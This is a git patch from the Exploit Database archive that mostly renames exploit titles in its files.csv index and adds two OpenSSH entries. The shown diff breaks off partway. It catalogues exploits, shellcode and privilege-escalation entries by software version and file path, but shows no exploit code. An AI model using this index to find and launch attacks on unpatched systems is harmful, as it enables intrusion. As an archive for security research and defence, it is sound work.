From 897e1fa191224ae5301eea5c6006316dd37513ce Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 24 Dec 2016 05:01:17 +0000 Subject: [PATCH] DB: 2016-12-24 3 new exploits WinFTP Server 2.0.2 - (PASV) Remote Denial of Service WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service WinFTP Server 2.3.0 - (NLST) Denial of Service WinFTP Server 2.3.0 - 'NLST' Denial of Service vxFtpSrv 2.0.3 - CWD command Remote Buffer Overflow (PoC) vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC) OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation X7 Chat 2.0.5 - lib/message.php preg_replace() PHP Code Execution (Metasploit) X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit) OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading X7 Chat 2.0 - (help_file) Remote Command Execution X7 Chat 2.0 - 'help_file' Parameter Remote Command Execution Ultimate WebBoard 3.00 - (Category) SQL Injection PromoteWeb MySQL - 'go.php id' SQL Injection 212Cafe Board 0.07 - (view.php qID) SQL Injection Ultimate WebBoard 3.00 - 'Category' Parameter SQL Injection PromoteWeb MySQL - 'id' Parameter SQL Injection 212Cafe Board 0.07 - 'qID' Parameter SQL Injection The Gemini Portal - 'lang' Remote File Inclusion RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection ASPapp KnowledgeBase - 'catid' SQL Injection The Gemini Portal 4.7 - 'lang' Parameter Remote File Inclusion RPG.Board 0.0.8Beta2 - 'showtopic' Parameter SQL Injection ASPapp KnowledgeBase - 'catid' Parameter SQL Injection X7 Chat 2.0.1A1 - (mini.php help_file) Local File Inclusion X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion CoAST 0.95 - (sections_file) Remote File Inclusion Real Estate Manager - 'cat_id' SQL Injection LnBlog 0.9.0 - (plugin) Local File Inclusion PlugSpace 0.1 - (index.php navi) Local File Inclusion MyCard 1.0.2 - (gallery.php id) SQL Injection PowerPortal 2.0.13 - 'path' Local Directory Traversal PHP-Lance 1.52 - (show.php catid) SQL Injection Yoxel 1.23beta - (itpm_estimate.php a) Remote Code Execution CoAST 0.95 - 'sections_file' 
Parameter Remote File Inclusion Real Estate Manager 1.01 - 'cat_id' Parameter SQL Injection LnBlog 0.9.0 - 'plugin' Parameter Local File Inclusion PlugSpace 0.1 - 'navi' Parameter Local File Inclusion MyCard 1.0.2 - 'id' Parameter SQL Injection PowerPortal 2.0.13 - 'path' Parameter Local Directory Traversal PHP-Lance 1.52 - 'catid' Parameter SQL Injection Yoxel 1.23beta - 'itpm_estimate.php' Remote Code Execution ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection ZEELYRICS 2.0 - 'bannerclick.php' SQL Injection Pro Chat Rooms 3.0.3 - (guid) SQL Injection Pilot Group eTraining - 'news_read.php id' SQL Injection BbZL.php 0.92 - (lien_2) Local Directory Traversal Pro Chat Rooms 3.0.3 - SQL Injection Pilot Group eTraining - 'news_read.php' SQL Injection BbZL.php 0.92 - 'lien_2' Parameter Local Directory Traversal Arcadem Pro - 'articlecat' SQL Injection Arcadem Pro - 'articlecat' Parameter SQL Injection ArabCMS - 'rss.php rss' Local File Inclusion FAQ Management Script - 'catid' SQL Injection ArabCMS - 'rss.php' Local File Inclusion FAQ Management Script - 'catid' Parameter SQL Injection BookMarks Favourites Script - 'view_group.php id' SQL Injection BookMarks Favourites Script - 'id' Parameter SQL Injection BMForum 5.6 - (tagname) SQL Injection BMForum 5.6 - 'tagname' Parameter SQL Injection Crux Gallery 1.32 - (index.php theme) Local File Inclusion phpScheduleIt 1.2.10 - (reserve.php) Remote Code Execution RPortal 1.1 - (file_op) Remote File Inclusion Crux Gallery 1.32 - 'theme' Parameter Local File Inclusion phpScheduleIt 1.2.10 - 'reserve.php' Remote Code Execution RPortal 1.1 - 'file_op' Parameter Remote File Inclusion Link Trader - 'ratelink.php lnkid' SQL Injection Link Trader - 'lnkid' Parameter SQL Injection OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion OpenX 2.6 - (ac.php bannerid) Blind SQL Injection OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion OpenX 2.6 - 'bannerid' Parameter Blind SQL Injection X7 Chat 2.0.5 - (Authentication 
Bypass) SQL Injection X7 Chat 2.0.5 - Authentication Bypass Arcadem Pro 2.8 - (article) Blind SQL Injection Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection Link Trader - (lnkid) SQL Injection phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection (Metasploit) phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit) PowerPortal 1.1/1.3 - modules.php Traversal Arbitrary Directory Listing PowerPortal 1.1/1.3 - 'modules.php' Traversal Arbitrary Directory Listing Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion Atomic Photo Album 0.x/1.0 - 'Apa_PHPInclude.INC.php' Remote File Inclusion BMForum 3.0 - topic.php Multiple Parameter Cross-Site Scripting BMForum 3.0 - forums.php Multiple Parameter Cross-Site Scripting BMForum 3.0 - post.php forumid Parameter Cross-Site Scripting BMForum 3.0 - announcesys.php forumid Parameter Cross-Site Scripting BMForum 3.0 - 'topic.php' Cross-Site Scripting BMForum 3.0 - 'forums.php' Cross-Site Scripting BMForum 3.0 - 'post.php' Cross-Site Scripting BMForum 3.0 - 'announcesys.php' Cross-Site Scripting PowerPortal 1.1/1.3 - 'index.php' search Parameter Cross-Site Scripting PowerPortal 1.1/1.3 - search.php search Parameter Cross-Site Scripting PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting X7 Chat 2.0.4 - sources/frame.php room Parameter Cross-Site Scripting X7 Chat 2.0.4 - upgradev1.php INSTALL_X7CHATVERSION Parameter Cross-Site Scripting X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting BMForum 5.6 - 'index.php' outpused Parameter Cross-Site Scripting BMForum 5.6 - newtem/footer/bsd01footer.php Multiple Parameter Cross-Site Scripting BMForum 5.6 - newtem/header/bsd01header.php Multiple Parameter Cross-Site Scripting BMForum 5.6 - 'index.php' Cross-Site Scripting BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting BMForum 5.6 - 'bsd01header.php' 
Cross-Site Scripting Pilot Group eTraining - courses_login.php cat_id Parameter Cross-Site Scripting Pilot Group eTraining - news_read.php id Parameter Cross-Site Scripting Pilot Group eTraining - lessons_login.php Multiple Parameter Cross-Site Scripting Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting Pilot Group eTraining - 'news_read.php' Cross-Site Scripting Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting OpenX - /www/admin/plugin-index.php parent Parameter Cross-Site Scripting OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting Apache mod_session_crypto - Padding Oracle
---
 files.csv | 114 ++++----- platforms/linux/local/40962.txt | 26 ++ platforms/linux/remote/40963.txt | 33 +++ platforms/multiple/dos/40955.txt | 155 +++++++++++- platforms/multiple/webapps/40961.py | 376 ++++++++++++++++++++++++++++ platforms/php/webapps/10834.txt | 28 --- 6 files changed, 639 insertions(+), 93 deletions(-) create mode 100755 platforms/linux/local/40962.txt create mode 100755 platforms/linux/remote/40963.txt create mode 100755 platforms/multiple/webapps/40961.py delete mode 100755 platforms/php/webapps/10834.txt
diff --git a/files.csv b/files.csv
index a7326637b..7b5ac0676 100644
--- a/files.csv
+++ b/files.csv
@@ -443,7 +443,7 @@ id,file,description,date,author,platform,type,port
 2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control - 'ole32.dll' Denial of Service",2006-12-18,shinnai,windows,dos,0
 2947,platforms/multiple/dos/2947.pl,"wget 1.10.2 - (Unchecked Boundary Condition) Denial of Service",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0
 2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption",2006-12-19,"Breno Silva Pinto",multiple,dos,0
-2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - (PASV) Remote Denial of Service",2006-12-19,shinnai,windows,dos,0
+2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service",2006-12-19,shinnai,windows,dos,0
 2954,platforms/linux/dos/2954.html,"KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception Exploit",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0
 2961,platforms/hardware/dos/2961.py,"Hewlett-Packard (HP) FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0
 2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 - (ActiveX Control) Denial of Service",2006-12-20,shinnai,windows,dos,0
@@ -801,7 +801,7 @@ id,file,description,date,author,platform,type,port
 6554,platforms/windows/dos/6554.html,"Google Chrome - Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos,0
 6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)",2008-09-25,securfrog,windows,dos,0
 6565,platforms/windows/dos/6565.txt,"K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer Denial of Service (PoC)",2008-09-25,Aodrulez,windows,dos,0
-6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - (NLST) Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0
+6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - 'NLST' Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0
 6582,platforms/hardware/dos/6582.pl,"Microsoft Windows Mobile 6.0 - Device long name Remote Reboot Exploit",2008-09-26,"Julien Bedard",hardware,dos,0
 6588,platforms/windows/dos/6588.txt,"Microsoft Windows - GDI+ '.ico' Remote Division By Zero Exploit",2008-09-26,"laurent gaffié",windows,dos,0
 6609,platforms/windows/dos/6609.html,"Google Chrome 0.2.149.30 - Window Object Suppressing Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0
@@ -811,7 +811,7 @@ id,file,description,date,author,platform,type,port
 6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - PoC (MS08-052)",2008-09-28,"John Smith",windows,dos,0
 6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x - Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0
 6647,platforms/windows/dos/6647.c,"ESET SysInspector 1.1.1.0 - 'esiadrv.sys' (PoC)",2008-10-01,"NT Internals",windows,dos,0
-6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - CWD command Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0
+6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0
 6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow (PoC)",2008-10-02,securfrog,windows,dos,0
 6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0
 6660,platforms/windows/dos/6660.txt,"Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
@@ -8733,6 +8733,7 @@ id,file,description,date,author,platform,type,port
 40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
 40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
 40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
+40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -14517,7 +14518,7 @@ id,file,description,date,author,platform,type,port
 35170,platforms/hardware/remote/35170.txt,"Lexmark X651de - Printer Ready Message Value HTML Injection",2011-01-06,"dave b",hardware,remote,0
 35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Execution",2011-01-05,d3c0der,windows,remote,0
 35180,platforms/bsd/remote/35180.rb,"Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)",2014-11-06,Metasploit,bsd,remote,0
-35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - lib/message.php preg_replace() PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80
+35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80
 35184,platforms/hardware/remote/35184.py,"Belkin n750 - jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080
 35188,platforms/windows/remote/35188.py,"Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote,0
 35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0
@@ -15192,6 +15193,7 @@ id,file,description,date,author,platform,type,port
 40920,platforms/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0
 40930,platforms/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,osx,remote,0
 40949,platforms/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",cgi,remote,80
+40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -16171,7 +16173,7 @@ id,file,description,date,author,platform,type,port
 1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote File Inclusion",2006-04-30,Aesthetico,php,webapps,0
 1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - 'lostpw.php' Remote File Inclusion",2006-04-30,cijfer,php,webapps,0
 1733,platforms/php/webapps/1733.pl,"Invision Power Board 2.1.5 - (from_contact) SQL Injection",2006-05-01,"Ykstortion Security",php,webapps,0
-1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0
+1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Parameter Remote Command Execution",2006-05-02,rgod,php,webapps,0
 1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3 / 2.3.8 - (show.php) Remote File Inclusion",2006-05-02,R@1D3N,php,webapps,0
 1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion",2006-05-03,webDEViL,php,webapps,0
 1747,platforms/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0
@@ -19544,69 +19546,69 @@ id,file,description,date,author,platform,type,port
 6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - 'FCKeditor' Arbitrary File Upload",2008-09-25,Stack,php,webapps,0
 6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection",2008-09-26,Stack,php,webapps,0
 6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - 'class_dir' Parameter Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0
-6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
-6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'go.php id' SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
-6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - (view.php qID) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
+6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - 'Category' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
+6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'id' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
+6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - 'qID' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
 6579,platforms/php/webapps/6579.txt,"Libra PHP File Manager 1.18 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0
 6580,platforms/php/webapps/6580.txt,"Atomic Photo Album 1.1.0pre4 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0
 6583,platforms/php/webapps/6583.txt,"Esqlanelapse Software Project 2.6.2 - Insecure Cookie Handling",2008-09-26,ZoRLu,php,webapps,0
 6584,platforms/php/webapps/6584.txt,"The Gemini Portal 4.7 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0
 6585,platforms/php/webapps/6585.txt,"openEngine 2.0 beta2 - Remote File Inclusion",2008-09-26,Crackers_Child,php,webapps,0
 6586,platforms/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0
-6587,platforms/php/webapps/6587.txt,"The Gemini Portal - 'lang' Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0
-6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection",2008-09-26,0x90,php,webapps,0
-6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' SQL Injection",2008-09-27,Crackers_Child,php,webapps,0
+6587,platforms/php/webapps/6587.txt,"The Gemini Portal 4.7 - 'lang' Parameter Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0
+6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' Parameter SQL Injection",2008-09-26,0x90,php,webapps,0
+6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' Parameter SQL Injection",2008-09-27,Crackers_Child,php,webapps,0
 6591,platforms/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0
-6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - (mini.php help_file) Local File Inclusion",2008-09-27,NoGe,php,webapps,0
+6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion",2008-09-27,NoGe,php,webapps,0
 6593,platforms/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - SQL Injection",2008-09-27,elusiven,php,webapps,0
 6594,platforms/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload",2008-09-27,Mi4night,php,webapps,0
 6595,platforms/php/webapps/6595.txt,"Joovili 3.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps,0
 6596,platforms/php/webapps/6596.txt,"E-Uploader Pro 1.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps,0
-6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - (sections_file) Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0
-6599,platforms/php/webapps/6599.txt,"Real Estate Manager - 'cat_id' SQL Injection",2008-09-27,CraCkEr,php,webapps,0
-6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - (plugin) Local File Inclusion",2008-09-27,dun,php,webapps,0
-6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - (index.php navi) Local File Inclusion",2008-09-27,dun,php,webapps,0
-6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - (gallery.php id) SQL Injection",2008-09-27,r45c4l,php,webapps,0
-6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0
-6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - (show.php catid) SQL Injection",2008-09-27,InjEctOr5,php,webapps,0
-6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - (itpm_estimate.php a) Remote Code Execution",2008-09-27,dun,php,webapps,0
+6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - 'sections_file' Parameter Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0
+6599,platforms/php/webapps/6599.txt,"Real Estate Manager 1.01 - 'cat_id' Parameter SQL Injection",2008-09-27,CraCkEr,php,webapps,0
+6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - 'plugin' Parameter Local File Inclusion",2008-09-27,dun,php,webapps,0
+6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - 'navi' Parameter Local File Inclusion",2008-09-27,dun,php,webapps,0
+6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - 'id' Parameter SQL Injection",2008-09-27,r45c4l,php,webapps,0
+6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Parameter Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0
+6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - 'catid' Parameter SQL Injection",2008-09-27,InjEctOr5,php,webapps,0
+6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - 'itpm_estimate.php' Remote Code Execution",2008-09-27,dun,php,webapps,0
 6607,platforms/php/webapps/6607.txt,"X7 Chat 2.0.1A1 - Local File Inclusion",2008-09-27,JIKO,php,webapps,0
-6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection",2008-09-28,"Hussin X",php,webapps,0
+6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - 'bannerclick.php' SQL Injection",2008-09-28,"Hussin X",php,webapps,0
 6610,platforms/asp/webapps/6610.txt,"ParsaWeb CMS - 'Search' SQL Injection",2008-09-28,BugReport.IR,asp,webapps,0
 6611,platforms/php/webapps/6611.php,"PHPcounter 1.3.2 - 'index.php' SQL Injection",2008-09-28,StAkeR,php,webapps,0
-6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - (guid) SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0
-6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php id' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0
-6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - (lien_2) Local Directory Traversal",2008-09-28,JIKO,php,webapps,0
+6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0
+6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0
+6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - 'lien_2' Parameter Local Directory Traversal",2008-09-28,JIKO,php,webapps,0
 6618,platforms/php/webapps/6618.txt,"Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps,0
 6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - 'linkid' Parameter SQL Injection",2008-09-28,boom3rang,php,webapps,0
 6621,platforms/php/webapps/6621.txt,"BbZL.php 0.92 - Insecure Cookie Handling",2008-09-28,Stack,php,webapps,0
 6623,platforms/php/webapps/6623.txt,"events Calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",php,webapps,0
-6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' SQL Injection",2008-09-29,"Hussin X",php,webapps,0
+6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' Parameter SQL Injection",2008-09-29,"Hussin X",php,webapps,0
 6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 - Insecure Cookie Handling",2008-09-29,Crackers_Child,php,webapps,0
 6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script - Multiple SQL Injections",2008-09-29,"Super Cristal",php,webapps,0
-6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php rss' Local File Inclusion",2008-09-29,JIKO,php,webapps,0
-6629,platforms/php/webapps/6629.txt,"FAQ Management Script - 'catid' SQL Injection",2008-09-30,"Hussin X",php,webapps,0
+6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php' Local File Inclusion",2008-09-29,JIKO,php,webapps,0
+6629,platforms/php/webapps/6629.txt,"FAQ Management Script - 'catid' Parameter SQL Injection",2008-09-30,"Hussin X",php,webapps,0
 6631,platforms/php/webapps/6631.txt,"SG Real Estate Portal 2.0 - Blind SQL Injection / Local File Inclusion",2008-09-30,SirGod,php,webapps,0
 6632,platforms/php/webapps/6632.txt,"MiNBank 1.5.0 - Multiple Remote File Inclusion",2008-09-30,DaRkLiFe,php,webapps,0
 6633,platforms/php/webapps/6633.txt,"eFront 3.5.1 / build 2710 - Arbitrary File Upload",2008-09-30,Pepelux,php,webapps,0
 6634,platforms/php/webapps/6634.php,"SG Real Estate Portal 2.0 - Blind SQL Injection",2008-09-30,Stack,php,webapps,0
 6635,platforms/php/webapps/6635.txt,"SG Real Estate Portal 2.0 - Insecure Cookie Handling",2008-09-30,Stack,php,webapps,0
 6636,platforms/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 - Blind SQL Injection",2008-09-30,ka0x,php,webapps,0
-6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - 'view_group.php id' SQL Injection",2008-09-30,"Hussin X",php,webapps,0
+6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - 'id' Parameter SQL Injection",2008-09-30,"Hussin X",php,webapps,0
 6639,platforms/php/webapps/6639.txt,"Pritlog 0.4 - 'Filename' Remote File Disclosure",2008-09-30,Pepelux,php,webapps,0
 6640,platforms/php/webapps/6640.pl,"ADN Forum 1.0b - Blind SQL Injection",2008-10-01,StAkeR,php,webapps,0
 6641,platforms/php/webapps/6641.txt,"MySQL Quick Admin 1.5.5 - 'cookie' Local File Inclusion",2008-10-01,JosS,php,webapps,0
-6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - (tagname) SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0
+6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - 'tagname' Parameter SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0
 6643,platforms/php/webapps/6643.txt,"Discussion Forums 2k 3.3 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0
 6644,platforms/php/webapps/6644.txt,"Noname CMS 1.0 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0
-6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - (index.php theme) Local File Inclusion",2008-10-01,StAkeR,php,webapps,0
-6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - (reserve.php) Remote Code Execution",2008-10-01,EgiX,php,webapps,0
-6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - (file_op) Remote File Inclusion",2008-10-01,Kad,php,webapps,0
+6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - 'theme' Parameter Local File Inclusion",2008-10-01,StAkeR,php,webapps,0
+6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - 'reserve.php' Remote Code Execution",2008-10-01,EgiX,php,webapps,0
+6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - 'file_op' Parameter Remote File Inclusion",2008-10-01,Kad,php,webapps,0
 6649,platforms/php/webapps/6649.txt,"phpscripts Ranking Script - Insecure Cookie Handling",2008-10-01,Crackers_Child,php,webapps,0
-6650,platforms/php/webapps/6650.txt,"Link Trader - 'ratelink.php lnkid' SQL Injection",2008-10-01,"Hussin X",php,webapps,0
+6650,platforms/php/webapps/6650.txt,"Link Trader - 'lnkid' Parameter SQL Injection",2008-10-01,"Hussin X",php,webapps,0
 6652,platforms/php/webapps/6652.txt,"Bux.to Clone Script - Insecure Cookie Handling",2008-10-02,SirGod,php,webapps,0
-6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion",2008-10-02,ZeN,php,webapps,0
-6655,platforms/php/webapps/6655.php,"OpenX 2.6 - (ac.php bannerid) Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0
